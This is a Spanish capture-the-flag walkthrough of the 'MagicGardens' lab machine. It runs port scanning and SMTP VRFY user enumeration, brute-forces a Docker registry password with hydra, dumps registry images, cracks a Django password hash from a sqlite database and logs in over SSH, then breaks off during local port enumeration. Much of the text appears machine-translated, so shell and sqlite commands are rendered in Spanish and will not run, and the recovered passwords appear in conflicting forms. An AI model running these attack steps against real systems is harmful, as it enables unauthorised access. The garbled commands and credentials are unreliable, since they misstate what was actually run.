MagicGardens (port:25)
Escaneo:
nmap -p- --min-rate 5000 -oN fast_scan.txt 10.10.11.9┌──(docker㉿docker)-[~/HackBox]
└─$ cat fast_scan.txt
# Nmap 7.94SVN scan initiated Sat Dec 28 18:28:40 2024 as: /usr/lib/nmap/nmap --privileged -p- --min-rate 5000 -oN fast_scan.txt 10.10.11.9
Warning: 10.10.11.9 giving up on port because retransmission cap hit (10).
Nmap scan report for magicgardens.htb (10.10.11.9)
Host is up (0.24s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
1337/tcp open waste
5000/tcp open upnp
# Nmap done at Sat Dec 28 18:29:07 2024 -- 1 IP address (1 host up) scanned in 27.51 seconds
Visitamos el 80:
Directorio de fuerza bruta
Correré gobuster a buscar directorios.
┌──(docker㉿docker)-[~/HackBox]
└─$ gobuster dir -u http://magicgardens.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 -x txt,html,php -k Encuentra más de un directorio aquí, pero ninguno de ellos nos funciona.
SMTP-TCP 25
En el escaneo de puertos se puede ver que el puerto 25 admite VRFY. El comando VRFY se utiliza para verificar si el usuario está presente en el servidor SMTP. Un atacante puede utilizar el comando VRFY para enumerar usuarios y así obtener información útil sobre el sistema de destino. En los servidores SMTP modernos, el comando VRFY suele estar deshabilitado para evitar ataques de enumeración de usuarios.
./smtp-user-enum -U /usr/share/wordlists/SecLists/Usernames/Names/malenames-usa-top1000.txt magicgardens.htb 25./smtp-user-enum -U /usr/share/wordlists/SecLists/Usernames/Names/malenames-usa-top1000.txt magicgardens.htb 25
Connecting to magicgardens.htb 25 ...
220 magicgardens.magicgardens.htb ESMTP Postfix (Debian/GNU)
250 magicgardens.magicgardens.htb
Start enumerating users with VRFY mode ...
220 magicgardens.magicgardens.htb ESMTP Postfix (Debian/GNU)
250 magicgardens.magicgardens.htb
[----] FRANCISCO 550 5.1.1 <FRANCISCO>: Recipient address rejected: User unknown in local recipient table
[----] MARCUS 550 5.1.1 <MARCUS>: Recipient address rejected: User unknown in local recipient table
[----] MICHEAL 550 5.1.1 <MICHEAL>: Recipient address rejected: User unknown in local recipient table
[----] THEODORE 550 5.1.1 <THEODORE>: Recipient address rejected: User unknown in local recipient table
[----] CLIFFORD 550 5.1.1 <CLIFFORD>: Recipient address rejected: User unknown in local recipient table
[----] MIGUEL 550 5.1.1 <MIGUEL>: Recipient address rejected: User unknown in local recipient table
[----] OSCAR 550 5.1.1 <OSCAR>: Recipient address rejected: User unknown in local recipient table
[----] JAY 550 5.1.1 <JAY>: Recipient address rejected: User unknown in local recipient table
[----] JIM 550 5.1.1 <JIM>: Recipient address rejected: User unknown in local recipient table
[----] TOM 550 5.1.1 <TOM>: Recipient address rejected: User unknown in local recipient table
[----] CALVIN 550 5.1.1 <CALVIN>: Recipient address rejected: User unknown in local recipient table
[----] ALEX 252 2.0.0 ALEXRegistro Docker - TCP 5000
raíz@kali# hydra -f -l alex -P /usr/share/wordlists/rockyou.txt 10.10.11.9 -s 5000 https-get /v2/
Hydra v9.5 (c) 2023 por van Hauser/THC y David Maciejak - No lo use en organizaciones militares o de servicios secretos, o para fines ilegales (esto no es vinculante, estos *** ignoran las leyes y la ética de todos modos).
Hydra (https://github.com/vanhauser-thc/thc-hydra) a partir del 23/05/2024 19:20:55
[DATOS] máximo 16 tareas por 1 servidor, en total 16 tareas, 14344399 intentos de inicio de sesión (l:1/p:14344399), ~896525 intentos por tarea
[DATOS] atacando http-gets://10.10.11.9:5000/v2/
[5000][http-get] host: 10.10.11.9 nombre de usuario: alex contraseña: diamonds
[ESTADO] Ataque finalizado para 10.10.11.9 (se encontró un par válido)
1 de 1 objetivo completado con éxito, 1 contraseña válida encontrada
Hydra (https://github.com/vanhauser-thc/thc-hydra) finalizó el 23/05/2024 a las 19:21:55Vuelco archivos de todos Docker Registry:
Grabación de registros de Docker
raíz@kali# python3 drg.py https://10.10.11.9 -U alex -P diamantes --dump_all
[+] jardinesmágicos.htb
[+] BlobSum encontró 30
[+] Descartando magicgardens.htb
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : b0c11cc482abe59dbeea1133c92720f7a3feca9c837d75fd76936b1c6243938c
[+] Descargando : 748da8c1b87e668267b90ea305e2671b22d046dcfeb189152bf590d594c3b3fc
[+] Descargando : 81771b31efb313fb18dae7d8ca3a93c8c4554aa09239e09d61bbbc7ed58d4515
[+] Descargando : 35b21a215463f8130302987a1954d01a8346cdd82c861d57eeb3cfb94d6511a8
[+] Descargando : 437853d7b910e50d0a0a43b077da00948a21289a32e6ce082eb4d44593768eb1
[+] Descargando : f9afd820562f8d93873f4dfed53f9065b928c552cf920e52e804177eff8b2c82
[+] Descargando : d66316738a2760996cb59c8eb2b28c8fa10a73ce1d98fb75fda66071a1c659d6
[+] Descargando : fedbb0514db0150f2376b0f778e5f304c302b53619b96a08824c50da7e3e97ea
[+] Descargando : 480311b89e2d843d87e76ea44ffbb212643ba89c1e147f0d0ff800b5fe8964fb
[+] Descargando : 02cea9e48b60ccaf6476be25bac7b982d97ef0ed66baeb8b0cffad643ece37d5
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : 8999ec22cbc0ab31d0e3471d591538ff6b2b4c3bbace9c2a97e6c68844382a78
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : 470924304c244ba833543bb487c73e232fd34623cdbfa51d30eab30ce802a10d
[+] Descargando : 4bc8eb4a36a30acad7a56cf0b58b279b14fce7dd6623717f32896ea748774a59
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : 9c94b131279a02de1f5c2eb72e9cda9830b128840470843e0761a45d7bebbefe
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : c485c4ba383179db59368a8a4d2df3e783620647fe0b014331c7fd2bd8526e5b
[+] Descargando : 9b1fd34c30b75e7edb20c2fd09a9862697f302ef9ae357e521ef3c84d5534e3f
[+] Descargando : d31b0195ec5f04dfc78eca9d73b5d223fc36a29f54ee888bc4e0615b5839e692
[+] Descargando : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Descargando : de4cac68b6165c40cf6f8b30417948c31be03a968e233e55ee40221553a5e570
Extraeré todos los archivos que tengo a través de Docker:
root@kali# para el archivo en *.tar.gz; hacer tar -xzf "$file"; hechoShell como Morty
Crack Morty Hash
Después de buscar las carpetas, /usr/src/appla ruta me resulta muy útil aquí.
Aquí encuentro la contraseña del usuario mortyen formato hash.
raíz@kali# sqlite3 db.sqlite3
Versión 3.45.1 de SQLite 2024-01-30 16:01:20
Introduzca ".help" para obtener sugerencias de uso.
sqlite> .tablas
grupo de autenticación tipo de contenido de django
permisos de grupo de autenticación migraciones de django
permiso de autenticación sesión de django
usuario_autenticación orden_tienda
grupos de usuarios de autenticación tienda de productos
auth_user_user_permissions tienda_tiendamensaje
django_admin_log usuario_tienda_tienda
sqlite> seleccione * de auth_user;
2|pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=|2023-06-06 17:34:56.520750|1|morty|||1|1|2023-06-06 17:32:24|
sqlite>Estoy buscando encontrar el formato hash correcto con Hashcat:
Para saber con que tipo de hash estamos trabajando y cual parametro es el indicado:
┌──(docker㉿docker)-[~/HackBox/smtp-user-enum]
└─$ hashcat -h | grep -i pbkdf2
11900 | PBKDF2-HMAC-MD5 | Generic KDF
12000 | PBKDF2-HMAC-SHA1 | Generic KDF
10900 | PBKDF2-HMAC-SHA256 | Generic KDF
12100 | PBKDF2-HMAC-SHA512 | Generic KDF
2500 | WPA-EAPOL-PBKDF2 | Network Protocol
22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocol
16800 | WPA-PMKID-PBKDF2 | Network Protocol
12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System
9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server
27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC) | Full-Disk Encryption (FDE)
27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS) | Full-Disk Encryption (FDE)
27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS) | Full-Disk Encryption (FDE)
21600 | Web2py pbkdf2-sha512 | Framework
10000 | Django (PBKDF2-SHA256) | Framework
12001 | Atlassian (PBKDF2-HMAC-SHA1) | Framework
20200 | Python passlib pbkdf2-sha512 | Framework
20300 | Python passlib pbkdf2-sha256 | Framework
20400 | Python passlib pbkdf2-sha1 | Framework
24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES) | Private Key
24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES) | Private Key
23200 | XMPP SCRAM PBKDF2-SHA1 | Instant Messaging Service
22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1) | Instant Messaging Service
24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512) | Instant Messaging Service
29600 | Terra Station Wallet (AES256-CBC(PBKDF2($pass))) | Cryptocurrency Wallet
16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Cryptocurrency Wallet
15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Cryptocurrency Wallet
Para nuestro hash es un 10000 | Django (PBKDF2-SHA256)
hashcat -m 10000 hash.key /usr/share/wordlists/rockyou.txt //pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:hermanosjonasEntramos por ssh:
ssh morty@magicgardens.htbjonasbrothers
Se puede usar Linpeas pero lo hare manualmente.
Abriremos un tunel dinamico para cada puerto abierto y ver que hay..
mort@magicgardens:~/bot$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:55587 0.0.0.0:* LISTEN 1877/geckodriver
tcp 0 0 127.0.0.1:49869 0.0.0.0:* LISTEN 1883/firefox-esr
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:38417 0.0.0.0:* LISTEN 1883/firefox-esr
tcp 0 0 127.0.0.1:42577 0.0.0.0:* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::5000 :::* LISTEN - Se encontró en el tunel http://127.0.0.1:49869/ algo interesante..
Last updated